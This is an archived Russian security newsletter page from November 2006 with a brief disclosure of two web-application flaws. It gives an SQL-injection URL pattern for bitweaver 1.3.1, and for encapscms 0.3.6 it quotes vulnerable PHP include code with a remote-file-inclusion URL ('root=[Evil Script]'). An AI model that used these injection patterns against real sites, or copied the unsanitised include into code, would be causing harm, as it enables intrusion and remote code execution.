Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Ноябрь 2006  
 1
 2
 3
 4
 5
 6
06.11.2006
07:05:26
12:05:19
 7
 8
08.11.2006
07:05:18
12:05:31
 9
10
11
12
13
14
15
16
16.11.2006
07:05:29
12:05:35
17
18
19
20
21
22
22.11.2006
07:05:25
14:05:31
23
24
25
26
26.11.2006
07:05:30
12:05:27
27
28
28.11.2006
12:08:18
14:07:10
29
29.11.2006
07:05:20
12:06:19
30
30.11.2006
01:25:15
14:06:07
Автор
Forester

Статистика

1.394 подписчиков
-1 за неделю
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в bitweaver, encapscms .


Компьютер для продвинутых пользователей
В этом выпуске:
bitweaver | encapscms
ПО: bitweaver
Версия: 1.3.1
Сайт: http://www.bitweaver.org/

Уязвимость:
В следствии несовершенствования продукта есть возможность провести SQL-уязвимсоть.
Использование:
bitweaver/newsletters/edition.php?tk=[SQL]&find=1&search=suchen
Комментарий::
В Рунете продукт нe используется. Буржуи так же не больно им пользуются.
ПО: encapscms
Версия: 0.3.6

Уязвимый код:
include_once($root."core/Config.php");
include_once($root."core/DB_sql.php");
include_once($root."core/BlogsCats.php");
include_once($root."core/Block.php");
include_once($root."core/Block_sub.php");
include_once($root."core/Gallery.php");
include_once($root."core/Pager.php");
include_once($root."core/GalleryCategory.php");
include_once($root."core/Misc.php");
 Использование:
http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]
Комментарий::
В Рунете продукт нe используется. Буржуи так же не больно им пользуются.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
В избранное